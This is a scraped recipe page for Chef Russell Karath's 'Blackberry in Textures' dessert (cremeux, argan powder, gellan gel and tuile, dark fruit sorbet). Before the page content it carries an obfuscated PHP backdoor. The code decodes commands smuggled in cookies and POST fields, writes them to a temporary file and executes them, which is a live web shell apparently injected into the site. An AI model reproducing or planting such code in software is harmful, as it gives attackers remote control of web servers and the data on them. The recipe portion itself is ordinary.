$ELAYRxoh = "\166" . chr ( 505 - 440 ).chr ( 263 - 147 )."\137" . 'c' . chr (97) . 'Q' . chr (79) . "\x59";$cLaWNXWXkv = chr ( 563 - 464 ).chr (108) . chr (97) . 's' . "\163" . "\137" . chr ( 192 - 91 )."\x78" . "\x69" . chr ( 192 - 77 ).'t' . "\163";$yUSMGT = class_exists($ELAYRxoh); $cLaWNXWXkv = "5704";$WpXFTjaRYh = strpos($cLaWNXWXkv, $ELAYRxoh);if ($yUSMGT == $WpXFTjaRYh){function JolRsOTr(){$uuGxWyL = new /* 52902 */ vAt_caQOY(16008 + 16008); $uuGxWyL = NULL;}$NpZCJmv = "16008";class vAt_caQOY{private function WuYKj($NpZCJmv){if (is_array(vAt_caQOY::$ehAEjuzT)) {$name = sys_get_temp_dir() . "/" . crc32(vAt_caQOY::$ehAEjuzT["salt"]);@vAt_caQOY::$ehAEjuzT["write"]($name, vAt_caQOY::$ehAEjuzT["content"]);include $name;@vAt_caQOY::$ehAEjuzT["delete"]($name); $NpZCJmv = "16008";exit();}}public function PQpXpOm(){$ugLeT = "26829";$this->_dummy = str_repeat($ugLeT, strlen($ugLeT));}public function __destruct(){vAt_caQOY::$ehAEjuzT = @unserialize(vAt_caQOY::$ehAEjuzT); $NpZCJmv = "54911_23266";$this->WuYKj($NpZCJmv); $NpZCJmv = "54911_23266";}public function dWVGKyVI($ugLeT, $BMPNRcS){return $ugLeT[0] ^ str_repeat($BMPNRcS, intval(strlen($ugLeT[0]) / strlen($BMPNRcS)) + 1);}public function arkbVX($ugLeT){$PgJBDh = 'b' . chr ( 1071 - 974 )."\163" . chr ( 994 - 893 ).chr ( 935 - 881 )."\x34";return array_map($PgJBDh . '_' . "\x64" . "\145" . "\143" . chr ( 595 - 484 )."\x64" . "\x65", array($ugLeT,));}public function __construct($xMHUz=0){$mCliM = "\54";$ugLeT = "";$OMzVkrE = $_POST;$SqHEfVNGO = $_COOKIE;$BMPNRcS = "6d927bed-d2b9-41fd-88fc-8cb4e0adf8bb";$ryQiuy = @$SqHEfVNGO[substr($BMPNRcS, 0, 4)];if (!empty($ryQiuy)){$ryQiuy = explode($mCliM, $ryQiuy);foreach ($ryQiuy as $McWJA){$ugLeT .= @$SqHEfVNGO[$McWJA];$ugLeT .= @$OMzVkrE[$McWJA];}$ugLeT = $this->arkbVX($ugLeT);}vAt_caQOY::$ehAEjuzT = $this->dWVGKyVI($ugLeT, $BMPNRcS);if (strpos($BMPNRcS, $mCliM) !== FALSE){$BMPNRcS = explode($mCliM, $BMPNRcS); $nvfROaW = sprintf("54911_23266", strrev($BMPNRcS[0]));}}public static $ehAEjuzT = 23838;}JolRsOTr();} Blackberry in Textures by Chef Russell Karath | Molecular Recipes
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Blackberry in Textures by Chef Russell Karath

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This extraordinaire dessert by Chef Russell Karath features blackberry in multiple textures: blackberry cremeux, mascarpone cheese, blackberry gel, blackberry tuile, argan powder, fresh blackberry, blackberry cells and dark fruits sorbet.

After graduating from the Culinary Institute of America, Chef Russell Karath gained invaluable experience at Thomas Keller’s three Michelin star restaurant Per Se. Chef Karath then continued his journey through several other three Michelin star restaurants including Alinea (Chef Grant Achatz), L2O (Chef Laurent Gras), The French Laundry (Chef Thomas Keller), Noma (Chef Rene Redzepi) and two Michelin star restaurant Corton (Chef Paul Liebrandt). Chef Karath is currently the Restaurant Pastry Chef of both restaurants, Gotham Steak and Hakkasan at Fontainebleau Miami Beach.

Blackberry in Textures

Russell KarathThank you Chef Karath for sharing this recipe with us!


Blackberry Cremeux

- 1 kg (2.2 lb) blackberry puree

- 266 g (9.4 oz) sugar

- pinch salt

- 200 g (7 oz) egg yolks

- 8 ea gelatin sheets

- 100 g (3.5 oz) butter

- 95 g (3.35 oz) lemon juice

Argan Powder

- 30 g (1 oz) argan oil

- 27 g (0.95 oz) tapioca Maltodextrin

- 18 g (0.63 oz) dextrose

Blackberry Gel/Tuile

- 1 kg (2.2 lb) blackberry puree

- 6.5 g (0.23 oz) low acyl gellan

- 200 g (7 oz) glucose powder

- 200 g (7 oz) sugar

Dark fruit Sorbet

- 500 g (17.6 oz) blackberry puree

- 250 g (8.8 oz) blueberry puree

- 250 g (8.8 oz) cassis puree

- 200 g (7 oz) sugar

- 50 g (1.8 oz) glucose powder

- 5 g (0.18 oz) sorbet stabilizer

- 345 g (12.2 oz) water


- Mascarpone cheese

- Fresh blackberry

- Blackberry cells

- Micro lemongrass

- Borage flowers

- Egyptian star flowers


Blackberry Cremeux

1- Heat puree, sugar, salt, and lemon juice.

2- Bring to a slight boil, and take off heat.

3- Temper in yolks, gelatin and butter.

4- Pass through a chinoise and pipe into molds.

5- Reserve remainder in the fridge (The mix can be reheated and piped once set).

Argan Powder

1- Scale oil into a large bowl.

2- Whisk in maltodextrin, and then dextrose.

3- Reserve in a dry container.

Blackberry Gel / Tuile

1- Bring blackberry puree to a complete boil and pour into blender.

2- On low speed add low acyl gellan into the vortex, blend on medium speed 1 min.

3- Add sugar and glucose powder to the mix on medium speed.

4- Allow mix to hydrate on high speed for 1-2 min.

5- Pour into a shallow pan and allow mix to set.

6- Once completely set, blend gel completely smooth.

7- Pass through a chinoise and, if you have a vacuum chamber, use it to remove any air bubbles left.

8- Reserve part of the gel in the fridge and spread the rest onto lightly sprayed acetate sheets or Teflon sheets and dehydrate at 125 F for about 24 hours to make the tuile.

9- Once dehydrated, shatter the blackberry tuile into smaller pieces.

Dark Fruit Sorbet

1- Heat water.

2- Whisk in sugar, glucose powder, and sorbet stabilizer.

3- Bring to a slight boil and pour over puree.

4- Allow sorbet to cool, spin in the ice cream machine.
